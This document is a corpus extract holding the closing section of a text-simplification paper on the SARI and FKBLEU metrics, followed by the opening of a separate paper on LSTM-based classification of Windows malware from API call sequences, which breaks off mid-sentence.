paraphrases but also ensuring the generated paraphrases are sim- pler while fitting the contexts. Although many re- searchers have noticed this difficulty, PBMT-R is one of the few that tried to address it by promoting 408 Grammar Meaning Simplicity+ #tokens #chars Edit Dist. Normal Wikipedia 4.00 4.00 0.00 23 125 0.00 Simple Wikipedia 3.72 3.24 1.03 22 116 6.69 Mechanical Turk 3.70 3.36 1.35 19 104 8.25 PBMT-R (Wubben et al., 2012) 3.18 2.83 0.47 20 108 5.96 SBMT (PPDB + BLEU) 4.00 4.00 0.00 23 125 0.00 SBMT (PPDB + FKBLEU) 3.30 3.05 0.48 21 107 4.03 SBMT (PPDB + SARI) 3.50 3.16 0.65 23 118 3.98 Table 4: Human evaluation (Grammar, Meaning, Simplicity+) and basic statistics of our proposed systems (SBMTs) and baselines. PBMT-R is an reimplementation of the state-of-the-art system by Wubben et al. (2012). Newly proposed metrics FKBLEU and SARI show advantages for tuning. FK BLEU iBLEU FKBLEU SARI Normal Wikipedia 12.88 99.05 78.41 62.48 26.05 Simple Wikipedia 11.25 66.75 53.53 61.75 38.42 Mechanical Turk 10.80 100.0 74.31 73.60 43.71 PBMT-R (Wubben et al., 2012) 11.10 63.12 48.91 59.00 33.77 SBMT (PPDB + BLEU) 12.88 99.05 78.41 62.48 26.05 SBMT (PPDB + FKBLEU) 10.75 74.48 58.10 66.68 34.18 SBMT (PPDB + SARI) 10.90 72.36 58.15 66.57 37.91 Table 5: Automatic evaluation of different simplification systems. Most systems achieve similar FK readability scores as human. The SARI metric ranks all 5 different systems and 3 human references in the same order as human assess- ment. Tuning towards BLEU with all 8 references results in identical transformation (same as Normal Wikipedia), as this can get a near-perfect BLEU score of 99.05 (out of 100). outputs that are dissimilar to the input. Our best sys- tem is able to make more effective paraphrases (bet- ter Simplicity+) while introducing less errors (better Grammar and Meaning). Table 5 shows the automatic evaluation. An en- couraging fact is that SARI metric ranks all 5 dif- ferent systems and 3 human references in the same order as human assessment. Most systems achieve similar FK readability as human editors, using fewer words or words with fewer syllables. Tuning to- wards BLEU with all 8 references results in no trans- formation (same as input), as this can get a near- perfect BLEU score of 99.05 (out of 100). Table 6 shows the computation time for different metrics. SARI is only slightly slower than BLEU but achieves much better simplification quality. Time (milliseconds) BLEU 0.12540908 FKBLEU 1.2527733 SARI 0.15506646 Table 6: Average computation time of different metrics per candidate sentence. 4.3 Correlation of Automatic Metrics with Human Judgments Table 7 shows the correlation of automatic metrics with human judgment. There are several interesting observations. First, simplicity is essential in measuring the goodness of simplification. However, none of the existing metrics (i.e. FK, BLEU, iBLEU) demon- strate any significant correlation with the simplicity scores rated by humans, same as noted in previous work (Wubben et al., 2012; Štajner et al., 2014). In contrast, our two new metrics, FKBLEU and SARI, achieve a much better correlation with humans in simplicity judgment while still capturing the notion of grammaticality and meaning preservation. This explains why they are more suitable than BLEU to be used in training the simplification models. In particular, SARI provides a balanced and integrative measurement of system performance that can assist iterative development. To date, developing advanced simplification systems has been a difficult and time- consuming process, since it is impractical to run new 409 Spearman’s ρ ref. Grammar Meaning Simplicity+ FK none - 0.002 (≈ .976) 0.136 (<.010) 0.147 (<.010) BLEU single 0.366 (<.001) 0.459 (<.001) 0.151 (<.005) BLEU multiple 0.589 (<.001) 0.701 (<.001) 0.111 (<.050) iBLEU single 0.313 (<.001) 0.397 (<.001) 0.149 (<.005) iBLEU multiple 0.492 (<.001) 0.609 (<.001) 0.141 (<.010) FKBLEU multiple 0.349 (<.001) 0.410 (<.001) 0.235 (<.001) SARI multiple 0.342 (<.001) 0.397 (<.001) 0.343 (<.001) Table 7: Correlations (and two-tailed p-values) of metrics against the human ratings at sentence-level (also see Figure 3). In this work, we propose to use multiple (eight) references and two new metrics: FKBLEU and SARI. For all three criteria of simplification quality, SARI correlates reasonably with human judgments. In contrast, previous works use only a single reference. Existing metrics BLEU and iBLEU show higher correlations on grammaticality and meaning preservation using multiple references, but fail to measure the most important aspect of simplification – simplicity. human evaluation every time a new model is built or parameters are adjusted. Second, the correlation of automatic metrics with human judgment of grammaticality and meaning preservation is higher than any reported before (Wubben et al., 2012; Štajner et al., 2014). It val- idates our argument that constraining simplification to only paraphrasing reduces the complication from deletion and splitting, and thus makes automatic evaluation more feasible. Using multiple references further improves the correlations. 4.4 Why Does BLEU Correlate Strongly with Meaning/Grammar, and SARI with Simplicity? Here we look more deeply at the correlations of BLEU and SARI with human judgments. Our SARI metric has highest correlation with human judg- ments of simplicity, but BLEU exhibits higher corre- lations on grammaticality and meaning preservation. BLEU was designed to evaluate bilingual transla- tion systems. It measures the n-gram precision of a system’s output against one or more references. BLEU ignores recall (and compensates for this with its brevity penalty). BLEU prefers an output that is not too short and contains only n-grams that appear in any reference. The role of multiple references in BLEU is to capture allowable variations in trans- lation quality. When applied to monolingual tasks like simplification, BLEU does not take into account anything about the differences between the input and the references. In contrast, SARI takes into account both precision and recall, by looking at the differ- ence between the references and the input sentence. Figure 2: A scatter plot of BLEU scores vs. SARI scores for the individual sentences in our test set. The metrics’ scores for many sentences substantially diverge. Few of the sentences that scored perfectly in BLEU receive a high score from SARI. In this work, we use multiple references to capture many different ways of simplifying the input. Unlike bilingual translation, the more references created for the monolingual simplification task the more n-grams of the original input will be included in the references. That means, with more references, outputs that are close or identical to the input will get high BLEU. Outputs with few changes also receive high Grammar/Meaning scores from human judges; but these do not necessarily get high SARI score nor are they good simplifications. BLEU therefore tends to favor conservative systems that do not make many changes, while SARI penalizes them. This can be 410 0.1 0.2 0.3 0.4 0.5 0.6 0.7 0 1 2 3 4 H um an S co re SARI vs. Grammar 0.1 0.2 0.3 0.4 0.5 0.6 0.7 SARI vs. Meaning 0.1 0.2 0.3 0.4 0.5 0.6 0.7 SARI vs. Simplicity 0.0 0.2 0.4 0.6 0.8 1.0 1.2 Automatic Score 0 1 2 3 4 H um an S co re BLEU vs. Grammar 0.0 0.2 0.4 0.6 0.8 1.0 1.2 Automatic Score BLEU vs. Meaning 0.0 0.2 0.4 0.6 0.8 1.0 1.2 Automatic Score H um an R at in g BLEU vs. Simplicity Figure 3: Scatter plots of automatic metrics against human scores for individual sentences. seen in Figure 2 where sentences with a BLEU score of 1.0 receive a range of scores from SARI. The scatter plots in Figure 3 further illustrate the above analysis. These plots emphasize the correla- tion of high human scores on meaning/grammar for systems that make few changes (which BLEU re- wards, but SARI does not). The tradeoff is that con- servative outputs with few or no changes do not re- sult in increased simplicity. SARI correctly rewards systems that make changes that simplify the input. 5 Conclusions and Future Work In this paper, we presented an effective adaptation of statistical machine translation techniques. We find the approach promising in suggesting two new directions: designing tunable metrics that corre- late with human judgements and using simplicity- enriched paraphrase rules derived from larger data than the Normal-Simple Wikipedia dataset. For fu- ture work, we think it might be possible to design a universal metric that works for multiple text-to- text generation tasks (including sentence simplifica- tion, compression and error correction), at the same time using the same idea of comparing system out- put against multiple references and against the input. The metric could possibly include tunable parame- ters or weighted human judgments on references to accommodate different tasks. Finally, we are also interested in designing neural translation models for the simplification task. Acknowledgments The authors would like to thank Juri Ganitkevitch, Jonny Weese, Kristina Toutanova, Matt Post, and Shashi Narayan for valuable discussions. We also thank action editor Stefan Riezler and three anony- mous reviewers for their thoughtful comments. This material is based on research sponsored by the NSF under grant IIS-1430651 and the NSF GRFP under grant 1232825. The views and conclusions con- tained in this publication are those of the authors and should not be interpreted as representing offi- cial policies or endorsements of the NSF or the U.S. Government. This research is also supported by the Alfred P. Sloan Foundation, and by Facebook via a student fellowship and a faculty research award. 411 References Allen, D. (2009). A study of the role of relative clauses in the simplification of news texts for learners of English. System, 37(4):585–599. Amancio, M. A. and Specia, L. (2014). An analysis of crowdsourced text simplifications. In Proceed- ings of the 3rd Workshop on Predicting and Im- proving Text Readability for Target Reader Popu- lations (PITR). Angrosh, M., Nomoto, T., and Siddharthan, A. (2014). Lexico-syntactic text simplification and compression with typed dependencies. In Pro- ceedings of the 14th Conference of the Euro- pean Chapter of the Association for Computa- tional Linguistics (EACL). Bannard, C. and Callison-Burch, C. (2005). Para- phrasing with bilingual parallel corpora. In Pro- ceedings of the 43rd Annual Meeting of the Asso- ciation for Computational Linguistics (ACL). Biran, O., Brody, S., and Elhadad, N. (2011). Putting it simply: A context-aware approach to lexical simplification. In Proceedings of the 49th Annual Meeting of the Association for Computa- tional Linguistics: Human Language Technolo- gies (ACL-HLT). Carroll, J., Minnen, G., Pearce, D., Canning, Y., De- vlin, S., and Tait, J. (1999). Simplifying text for language-impaired readers. In Proceedings of the 14th Conference of the 9th European Conference for Computational Linguistics (EACL). Chan, T. P., Callison-Burch, C., and Van Durme, B. (2011). Reranking bilingually extracted para- phrases using monolingual distributional similar- ity. In Proceedings of the Workshop on Geo- metrical Models of Natural Language Semantics (MTTG). Chandrasekar, R., Doran, C., and Srinivas, B. (1996). Motivations and methods for text simpli- fication. In Proceedings of the 16th Conference on Computational linguistics (COLING). Chen, B., Kuhn, R., and Larkin, S. (2012a). PORT: A precision-order-recall MT evaluation metric for tuning. In Proceedings of the 50th Annual Meet- ing of the Association for Computational Linguis- tics (ACL). Chen, D. L. and Dolan, W. B. (2011). Collecting highly parallel data for paraphrase evaluation. In Proceedings of the 49th Annual Meeting of the As- sociation for Computational Linguistics (ACL). Chen, H.-B., Huang, H.-H., Chen, H.-H., and Tan, C.-T. (2012b). A simplification-translation- restoration framework for cross-domain SMT ap- plications. In Proceedings of the 24th Interna- tional Conference on Computational Linguistics (COLING). Chiang, D. (2007). Hierarchical phrase-based trans- lation. Computational Linguistics, 33(2):201– 228. Clarke, J. and Lapata, M. (2006). Models for sentence compression: A comparison across do- mains, training requirements and evaluation mea- sures. In Proceedings of the 21st International Conference on Computational Linguistics and 44th Annual Meeting of the Association for Com- putational Linguistics (ACL-COLING). Coster, W. and Kauchak, D. (2011a). Learning to simplify sentences using Wikipedia. In Proceed- ings of the Workshop on Monolingual Text-To-Text Generation. Coster, W. and Kauchak, D. (2011b). Simple En- glish Wikipedia: A new text simplification task. In Proceedings of the 49th Annual Meeting of the Association for Computational Linguistics: Hu- man Language Technologies (ACL-HLT). Dahlmeier, D. and Ng, H. T. (2012). Better eval- uation for grammatical error correction. In Pro- ceedings of the 2012 Conference of the North American Chapter of the Association for Compu- tational Linguistics: Human Language Technolo- gies (NAACL-HLT). De Belder, J. and Moens, M.-F. (2010). Text simpli- fication for children. In Proceedings of the SIGIR Workshop on Accessible Search Systems. Devlin, S., Tail, J., Canning, Y., Carroll, J., Min- nen, G., and Pearce, D. (1999). The application of assistive technology in facilitating the compre- hension of newspaper text by aphasic people. As- sistive Technology on the Threshold of the New Millennium, page 160. Evans, R., Orasan, C., and Dornescu, I. (2014). An evaluation of syntactic simplification rules 412 for people with autism. In Proceedings of the 3rd Workshop on Predicting and Improving Text Readability for Target Reader Populations (PITR). Felice, M. and Briscoe, T. (2015). Towards a stan- dard evaluation method for grammatical error de- tection and correction. In Proceedings of the 2015 Conference of the North American Chapter of the Association for Computational Linguistics (NAACL). Feng, L. (2008). Text simplification: A survey. The City University of New York, Technical Report. Filippova, K., Alfonseca, E., Colmenares, C. A., Kaiser, L., and Vinyals, O. (2015). Sentence com- pression by deletion with LSTMs. In Proceedings of the 2015 Conference on Empirical Methods in Natural Language Processing (EMNLP). Filippova, K. and Strube, M. (2008). Dependency tree based sentence compression. In Proceedings of the Fifth International Natural Language Gen- eration Conference (INLG). Galley, M., Brockett, C., Sordoni, A., Ji, Y., Auli, M., Quirk, C., Mitchell, M., Gao, J., and Dolan, B. (2015). deltaBLEU: A discriminative metric for generation tasks with intrinsically diverse tar- gets. In Proceedings of the 53rd Annual Meeting of the Association for Computational Linguistics (ACL). Ganitkevitch, J., Cao, Y., Weese, J., Post, M., and Callison-Burch, C. (2012a). Joshua 4.0: Packing, PRO, and paraphrases. In Proceedings of the Sev- enth Workshop on Statistical Machine Translation (WMT). Ganitkevitch, J., Van Durme, B., and Callison- Burch, C. (2012b). Monolingual distributional similarity for text-to-text generation. In Proceed- ings of the First Joint Conference on Lexical and Computational Semantics (*SEM). Ganitkevitch, J., Van Durme, B., and Callison- Burch, C. (2013). PPDB: The paraphrase database. In Proceedings of the 2013 Conference of the North American Chapter of the Association for Computational Linguistics (NAACL). Gao, M., Xu, W., and Callison-Burch, C. (2015). Cost optimization in crowdsourcing translation. In Proceedings of the 2015 Conference of the North American Chapter of the Association for Computational Linguistics (NAACL). Hopkins, M. and May, J. (2011). Tuning as rank- ing. In Proceedings of the Conference on Em- pirical Methods in Natural Language Processing (EMNLP). Horn, C., Manduca, C., and Kauchak, D. (2014). Learning a lexical simplifier using Wikipedia. In Proceedings of the 52th Annual Meeting of the As- sociatioin for Computational Linguistics (ACL). Hwang, W., Hajishirzi, H., Ostendorf, M., and Wu, W. (2015). Aligning sentences from Standard Wikipedia to Simple Wikipedia. In Proceed- ings of the 2015 Conference of the North Ameri- can Chapter of the Association for Computational Linguistics (NAACL). Inui, K., Fujita, A., Takahashi, T., Iida, R., and Iwakura, T. (2003). Text simplification for read- ing assistance: A project note. In Proceedings of the 2nd International Workshop on Paraphrasing (IWP). Kaji, N., Kawahara, D., Kurohash, S., and Sato, S. (2002). Verb paraphrase based on case frame alignment. In Proceedings of the 40th Annual Meeting on Association for Computational Lin- guistics (ACL). Kauchak, D. (2013). Improving text simplification language modeling using unsimplified text data. In Proceedings of the 2013 Conference of the As- sociation for Computational Linguistics (ACL). Kincaid, J. P., Fishburne Jr, R. P., Rogers, R. L., and Chissom, B. S. (1975). Derivation of new read- ability formulas (automated readability index, fog count and Flesch reading ease formula) for Navy enlisted personnel. Technical report, Defence Technical Information Center (DTIC) Document. Knight, K. and Marcu, D. (2002). Summarization beyond sentence extraction: A probabilistic ap- proach to sentence compression. Artificial Intelli- gence. Liu, C., Dahlmeier, D., and Ng, H. T. (2010). TESLA: Translation evaluation of sentences with linear-programming-based analysis. In Proceed- ings of the Joint Fifth Workshop on Statistical Ma- chine Translation and Metrics (MATR). 413 Miwa, M., Saetre, R., Miyao, Y., and Tsujii, J. (2010). Entity-focused sentence simplification for relation extraction. In Proceedings of the 23rd International Conference on Computational Lin- guistics (COLING). Napoles, C., Sakaguchi, K., Post, M., and Tetreault, J. (2015). Ground truth for grammatical error correction metrics. In Proceedings of the 53rd Annual Meeting of the Association for Computa- tional Linguistics (ACL). Narayan, S. and Gardent, C. (2014). Hybrid simpli- fication using deep semantics and machine trans- lation. In Proceedings of the 52nd Annual Meet- ing of the Association for Computational Linguis- tics (ACL). Och, F. J. (2003). Minimum error rate training in statistical machine translation. In Proceedings of the 41st Annual Meeting on Association for Com- putational Linguistics (ACL). Pavlick, E., Bos, J., Nissim, M., Beller, C., Durme, B. V., and Callison-Burch, C. (2015). Adding se- mantics to data-driven paraphrasing. In Proceed- ings of the 53rd Annual Meeting of the Associa- tion for Computational Linguistics (ACL). Pavlick, E. and Callison-Burch, C. (2016). Simple PPDB: A paraphrase database for simplification. In The 54th Annual Meeting of the Association for Computational Linguistics (ACL). Pellow, D. and Eskenazi, M. (2014a). An open corpus of everyday documents for simplification tasks. In Proceedings of the 3rd Workshop on Pre- dicting and Improving Text Readability for Target Reader Populations (PITR). Pellow, D. and Eskenazi, M. (2014b). Tracking hu- man process using crowd collaboration to enrich data. In Proceedings of Second AAAI Confer- ence on Human Computation and Crowdsourcing (HCOMP). Petersen, S. E. and Ostendorf, M. (2007). Text sim- plification for language learners: A corpus anal- ysis. In Proceedings of Workshop on Speech and Language Technology for (SLaTE). Post, M., Ganitkevitch, J., Orland, L., Weese, J., Cao, Y., and Callison-Burch, C. (2013). Joshua 5.0: Sparser, better, faster, server. In Proceed- ings of the Eighth Workshop on Statistical Ma- chine Translation (WMT). Rello, L., Baeza-Yates, R. A., and Saggion, H. (2013). The impact of lexical simplification by verbal paraphrases for people with and without dyslexia. In Proceedings of the 14th Interna- tional Conference on Intelligent Text Processing and Computational Linguistics (CICLing). Rush, A. M., Chopra, S., and Weston, J. (2015). A neural attention model for abstractive sentence summarization. In Proceedings of the 2015 Con- ference on Empirical Methods in Natural Lan- guage Processing (EMNLP). Siddharthan, A. (2006). Syntactic simplification and text cohesion. Research on Language and Com- putation, 4(1):77–109. Siddharthan, A. (2014). A survey of research on text simplification. Special issue of International Journal of Applied Linguistics, 165(2). Siddharthan, A. and Angrosh, M. (2014). Hybrid text simplification using synchronous dependency grammars with hand-written and automatically harvested rules. In Proceedings of the 25th Inter- national Conference on Computational Linguis- tics (COLING). Siddharthan, A. and Katsos, N. (2010). Reformulat- ing discourse connectives for non-expert readers. In Proceedings of the 2010 Annual Conference of the North American Chapter of the Association for Computational Linguistics: Human Language Technologies (NAACL-HLT). Siddharthan, A., Nenkova, A., and McKeown, K. (2004). Syntactic simplification for improving content selection in multi-document summariza- tion. In Proceedings of the 20th International Conference on Computational Linguistics (COL- ING). Specia, L., Jauhar, S. K., and Mihalcea, R. (2012). SemEval-2012 task 1: English lexical simplifica- tion. In Proceedings of the Sixth International Workshop on Semantic Evaluation (SemEval). Štajner, S., Béchara, H., and Saggion, H. (2015). A deeper exploration of the standard PB-SMT ap- proach to text simplification and its evaluation. In Proceedings of the 53rd Annual Meeting of the Association for Computational Linguistics (ACL). 414 Štajner, S., Mitkov, R., and Saggion, H. (2014). One step closer to automatic evaluation of text simpli- fication systems. In Proceedings of the 3rd Work- shop on Predicting and Improving Text Readabil- ity for Target Reader Populations (PITR). Sun, H. and Zhou, M. (2012). Joint learning of a dual SMT system for paraphrase generation. In Proceedings of the 50th Annual Meeting of the As- sociation for Computational Linguistics (ACL). Vickrey, D. and Koller, D. (2008). Sentence sim- plication for semantic role labeling. In Proceed- ings of the 46th Annual Meeting of the Associa- tion for Computational Linguistics: Human Lan- guage Technologies (ACL-HLT). Watanabe, W. M., Junior, A. C., Uzêda, V. R., Fortes, R. P. d. M., Pardo, T. A. S., and Aluı́sio, S. M. (2009). Facilita: Reading assistance for low-literacy readers. In Proceedings of the 27th ACM International Conference on Design of Communication (SIGDOC). Weese, J., Ganitkevitch, J., Callison-Burch, C., Post, M., and Lopez, A. (2011). Joshua 3.0: Syntax- based machine translation with the thrax grammar extractor. In Proceedings of the Sixth Workshop on Statistical Machine Translation (WMT). Woodsend, K. and Lapata, M. (2011). Learning to simplify sentences with quasi-synchronous gram- mar and integer programming. In Proceedings of the Conference on Empirical Methods in Natural Language Processing (EMNLP). Wubben, S., van den Bosch, A., and Krahmer, E. (2012). Sentence simplification by monolingual machine translation. In Proceedings of the 50th Annual Meeting of the Association for Computa- tional Linguistics (ACL). Xu, W., Callison-Burch, C., and Napoles, C. (2015). Problems in current text simplification research: New data can help. Transactions of the As- sociation for Computational Linguistics (TACL), 3:283–297. Xu, W., Ritter, A., Dolan, B., Grishman, R., and Cherry, C. (2012). Paraphrasing for style. In Pro- ceedings of the 24th International Conference on Computational Linguistics (COLING). Yatskar, M., Pang, B., Danescu-Niculescu-Mizil, C., and Lee, L. (2010). For the sake of simplicity: Unsupervised extraction of lexical simplifications from Wikipedia. In Proceedings of the 2010 An- nual Conference of the North American Chapter of the Association for Computational Linguistics: Human Language Technologies (ACL-HLT). Zhu, Z., Bernhard, D., and Gurevych, I. (2010). A monolingual tree-based translation model for sen- tence simplification. In Proceedings of the 23rd International Conference on Computational Lin- guistics (COLING). Zollmann, A. and Venugopal, A. (2006). Syntax augmented machine translation via chart parsing. In Proceedings of the Workshop on Statistical Ma- chine Translation (WMT). 415 416 work_ehr6hvkrsjbw7o6blqm2kzngf4 ---- Submitted 3 April 2020 Accepted 1 July 2020 Published 27 July 2020 Corresponding author Ferhat Ozgur Catak, ferhat.o.catak@ntnu.no, ozgur.catak@tubitak.gov.tr Academic editor Lerina Aversano Additional Information and Declarations can be found on page 21 DOI 10.7717/peerj-cs.285 Copyright 2020 Catak et al. Distributed under Creative Commons CC-BY 4.0 OPEN ACCESS Deep learning based Sequential model for malware analysis using Windows exe API Calls Ferhat Ozgur Catak1,3, Ahmet Faruk Yazı2, Ogerta Elezaj1 and Javed Ahmed1 1 Department of Information Security and Communication Technology, NTNU Norwegian University of Science and Technology, Gjøvik, Norway 2 Cyber Security Engineering, Istanbul Sehir University, Istanbul, Turkey 3 TUBITAK Bilgem Cyber Security Institute, Kocaeli, Turkey ABSTRACT Malware development has seen diversity in terms of architecture and features. This advancement in the competencies of malware poses a severe threat and opens new research dimensions in malware detection. This study is focused on metamorphic malware, which is the most advanced member of the malware family. It is quite impossible for anti-virus applications using traditional signature-based methods to detect metamorphic malware, which makes it difficult to classify this type of malware accordingly. Recent research literature about malware detection and classification discusses this issue related to malware behavior. The main goal of this paper is to develop a classification method according to malware types by taking into consideration the behavior of malware. We started this research by developing a new dataset containing API calls made on the windows operating system, which represents the behavior of malicious software. The types of malicious malware included in the dataset are Adware, Backdoor, Downloader, Dropper, spyware, Trojan, Virus, and Worm. The classification method used in this study is LSTM (Long Short-Term Memory), which is a widely used classification method in sequential data. The results obtained by the classifier demonstrate accuracy up to 95% with 0.83 $F_1$-score, which is quite satisfactory. We also run our experiments with binary and multi-class malware datasets to show the classification performance of the LSTM model. Another significant contribution of this research paper is the development of a new dataset for Windows operating systems based on API calls. To the best of our knowledge, there is no such dataset available before our research. The availability of our dataset on GitHub facilitates the research community in the domain of malware detection to benefit and make a further contribution to this domain. Subjects Artificial Intelligence, Data Mining and Machine Learning, Security and Privacy Keywords Malware analysis, Sequential models, Network security, Long-short-term memory, Malware dataset INTRODUCTION Malicious software, commonly known as malware, is any software intentionally designed to cause damage to computer systems and compromise user security. An application or code is considered malware if it secretly acts against the interests of the computer user and performs malicious activities. Malware targets various platforms such as servers, personal How to cite this article Catak FO, Yazı AF, Elezaj O, Ahmed J. 2020. Deep learning based Sequential model for malware analysis using Windows exe API Calls. PeerJ Comput. Sci. 6:e285 http://doi.org/10.7717/peerj-cs.285 https://peerj.com/computer-science mailto:ferhat.o.catak@ntnu.no mailto:ozgur.catak@tubitak.gov.tr https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/10.7717/peerj-cs.285 http://creativecommons.org/licenses/by/4.0/ http://creativecommons.org/licenses/by/4.0/ http://doi.org/10.7717/peerj-cs.285 computers, mobile phones, and cameras to gain unauthorized access, steal personal data, and disrupt the normal function of the system. Malware has been notorious for its malicious activities and attack for decades. Malware development has become a serious activity lately as the number of target platforms increases day by day, which significantly raises the importance of developing adequate techniques to detect them. Dynamic analysis of malware in different platforms is an evolving and challenging task. According to recent statistics, 40 million new malware has been infecting systems in the first 4 months of 2018 (https://www.mcafee.com/enterprise/en-us/assets/reports/rp-quarterly-threats-jun- 2018.pdf). This is evidence that malware is a significant threat in the systems and most of the time they are surpassing the capacities of malware analysts. Accordingly, great efforts are needed to protect against malware attacks. One approach to deal with malware protection problem is by identifying the malicious software and evaluating its behavior. Usually, this problem is solved through the analysis of malware behavior. This field closely follows the model of malicious software family, which also reflects the pattern of malicious behavior. There are very few studies that have demonstrated the methods of classification according to the malware families. Proper malware labeling is a challenging issue in this domain. An anti-virus application can detect malware as a trojan, whereas, the same malware is labeled as a worm by another anti-virus application. With the advent of sophisticated malware framework, it is difficult to handle these problems. The main practical challenge faced by researchers is that malware has achieved a very complicated level of competence and effectiveness. This allows for constant change of the code signatures (Rad, Masrom & Ibrahim, 2012). Consequently, anti-virus applications that use conventional signature-based detection methods can not detect such malware. Although a metamorphic malware that manifests itself with different code sequences in different environments, it must adopt the same behavior in all settings. Since they developed this malicious software to conduct a specific malicious activity, using this information, nearly all the methods used for the detection and classification of metamorphic malware tackle the behavioral characteristic and not the malware’s structural features. Data such as Windows API calls, DNS resolution, registry read/write operations are used in such methods to reflect malicious software behavior. All operating system API calls made to act by any software show the overall of this program. Whether this program is alware or not can be learned by examining these actions in-depth. If it is malware, then what is its malware family. The malware-made operating system API call is a data attribute, and the sequence in which those API calls are generated is also critical the malware family Performing specific API calls is a order that represents a behavior. One of the deep learning methods LSTM (long-short term memory) has been commonly used in the processing of such time-sequential data (Shamshirband, Rabczuk & Chau, 2019). Our research is based on the analysis of API calls made by malware on the Windows Operating System. We analyze the API calls made by different types of malware on the system to build a collection of malware-based API calls. This dataset the development of a method that can be useful for the identification of malware based on its behavior. We also construct malware detection models based on this dataset using the LSTM Catak et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.285 2/23 https://peerj.com https://www.mcafee.com/enterprise/en-us/assets/reports/rp-quarterly-threats-jun-2018.pdf https://www.mcafee.com/enterprise/en-us/assets/reports/rp-quarterly-threats-jun-2018.pdf http://dx.doi.org/10.7717/peerj-cs.285 algorithm. This model classifies malware even though it has undergone structural changes, i.e., metamorphic malware, but in the operating system behaves like a type of malware (Shamshirband & Chronopoulos, 2019). In our previous work, (Yazi, Catak & Gul, 2019) we applied a single layer LSTM model to detect the malware classes. In another work, (Çatak & Yazi, 2019), we describe our publicly available dataset in detail. Our research has made the following major contribution: • A new dataset has been developed for malware detection on Windows OS. Such a dataset does not exist in this domain. • Malware was analyzed, and API calls were recorded by running in an isolated sandbox environment. • Using the LSTM algorithm, which is commonly used for text classification, malware detection was modeled as a text classification problem, and the detection model for the malware type was developed. The rest of the article is organized as follows: Section 1 briefly introduces some of the earlier works related to our problem. Section 2 describes Windows API calls, Sandbox environment and LSTM algorithm. Section 3 shows our system model. Section 4 evaluates the proposed learning model. Section 5 concludes this paper. RELATED WORK Leder, Steinbock & Martini (2009) take into consideration structural changes of metamorphic malware. Using VSA (Value Set Analysis) method, detection processes were realized by removing the unchanging code structure found in malicious software, concluding that if there is no behavioral change in samples of metamorphic malware, the detection accuracy can be 100% (Leder, Steinbock & Martini, 2009). Although they examined the metamorphic software, and they only used the operating system processes. Vinod et al. (2010) generated malware signatures by using Windows API call sequences of metamorphic malware. The authors proposed a method for identifying and classifying malware families using these signatures. In this study, 80 malicious software has been created from each NGVCK, MPCGEN, G2, and IL_SMG families by using the VX Heavens application. A dataset is created by using software emulators in order to obtain Windows API call sequences. A dataset was created using this data. The accuracy achieved by the proposed method is 75%, 80%, 80%, and 75% for each family respectively (Vinod et al., 2010). In this study, they obtained a high detection rate. However, because they use signatures, attackers can evade this detection method. Qiao et al. (2013) developed a detection model by considering the behavior of malware. The API call sequences of malicious software on the Windows operating system were obtained by using the Cuckoo Sandbox application. An analysis method has been developed by subtracting frequently used elements from these call sequences. The dataset used during the analyses contains 3131 malware, and the accuracy rate obtained is 94% (Qiao et al., 2013). This work is very close to our study because they use API calls. However, since they do not model the API call sequences using a sequential method, they lose this information. Catak et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.285 3/23 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.285 Cheng, Tsai & Yang (2013) proposed an improved classification method of the behavior of malware is based on the information retrieval theory. Windows API call sequences of malware obtained from honeypots with the help of the Cuckoo Sandbox application were preprocessed with the aim to represent malicious behavior. These documents were analyzed using the TF-IDF weight, and the similarity measurement method was applied and in order to extract similarity characteristics of malicious software. A classification model was applied using these features, and the accuracy rate obtained was 97.7% (Cheng, Tsai & Yang, 2013). This work is alose close to our research because they use API calls. However, since they use TF-IDF representations of calls, Thus, they lose this information. Mehra, Jain & Uppal (2015) proposed a method to classify 600 malware where 268 of alware were created using VX Heaven. This malicious software has been extracted from the control flow and API request graphics using the Gourmand Feature Selection algorithm to extract the required call properties. The proposed solution was implemented using the Weka tool, whereas the classification was made using histogram and Chi-square difference measurement formulas according to malware families. The classification accuracy varies between 89.00% and 99.10% for different families (Mehra, Jain & Uppal, 2015). The number of malware contained in the dataset they use is relatively low. Also, as in other studies, the API call sequence was not used. Pirscoveanu et al. (2015) proposed a Supervised algorithm for the classification of malware, such as the Random Forests algorithm. A total of 42,000 malware behaviors were collected using the Cuckoo Sandbox application. DNS requests, Accessed Files, Mutexes and, Registry Keys data were used for the classification of Windows API calls. In addition, for the class labels of malicious software, the tags detected by Avast application are over the results provided by VirusTotal service. Trojan, Potentially Unwanted Program, Adware, and Rootkit classes are used for classification. The weighted average Area Under Curve (AUC) value of the proposed method is 0.98 (Pirscoveanu et al., 2015). The number of malware contained in the dataset they use is relatively high. Again, the API call sequence was not used. Ahmed, Nepal & Kim proposed a different approach malware detection. The detection of malicious software in this study is not based on the characteristics of malicious software on the effects; they have on the system. So, this method does not consider the structural and behavioral features of malware that are not considered in the detection process. Still, it is limited only in the detection of abnormal behavior on the system in an ordinary situation. In this way, the authors claimed that advanced malicious software such as polymorphic, metamorphic, zero-day malware could be detected (Ahmed, Nepal & Kim, 2018). Sami et al. (2010) developed a framework based on mining API calls of PE for malware detections. The framework includes a PE analyzer, feature generator, feature selector, and a classifier. The authors generate a set of discriminative and domain interpretable features by reading API call sets in a collection of PE files. The classifier is trained using these features. The authors also created the first public dataset and improved existing mining API methods for malware detection. The accuracy and detection rate are improved by 5.24% and 2.51%, respectively. They also reduced the false alarm rate from 19.86% to 1.51% (Sami et al., 2010). Their approach again ignores the call sequences. Catak et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.285 4/23 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.285 Alazab, Venkataraman & Watters (2010) used a four-step methodology to extract API call features using a fully automated method. The authors disassemble, analyze, and extract the API function calls from the binary content of malware using static analysis tool IDAPro disassembler to classify program executable as malicious or benign. Statistical tests were performed on extracted calls to determine the malware class based on suspicious behavior. The sample of 386 malware used to conduct experimental tests. The authors generated six different categories of suspicious behavior of API call features based on these preliminary tests (Alazab, Venkataraman & Watters, 2010). They applied static analysis techniques to detect malware. Attackers use lots of evading techniques to bypass the analysts. Peiravian & Zhu (2013) framework that uses permissions and API calls to detect malicious Android applications. The permissions are extracted from Android applications and combined with the API calls to characterize each application either as malware or a benign. The inherent advantage of this framework is that it does not need to involve any dynamical tracing of the system calls ut only uses simple static analysis to find system functions involved in the application. Experiments on 